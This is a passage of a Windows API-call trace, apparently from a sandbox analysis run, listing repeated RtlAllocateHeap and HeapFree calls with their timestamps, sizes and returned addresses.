lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106150 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1058e0 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a00 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a90 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105cd0 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1064b0 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105bb0 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105c40 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1065d0 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0036.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105730 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1074d0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106cf0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107560 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106e10 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1077a0 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107440 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0036.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109370 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103ad0 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1060c0 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103c80 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105d60 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103c80 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103ad0 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0036.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106390 [0036.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x1097d0 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0036.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x1096b8 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103c08 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0036.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0036.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0036.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103d10 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105730 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103d10 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 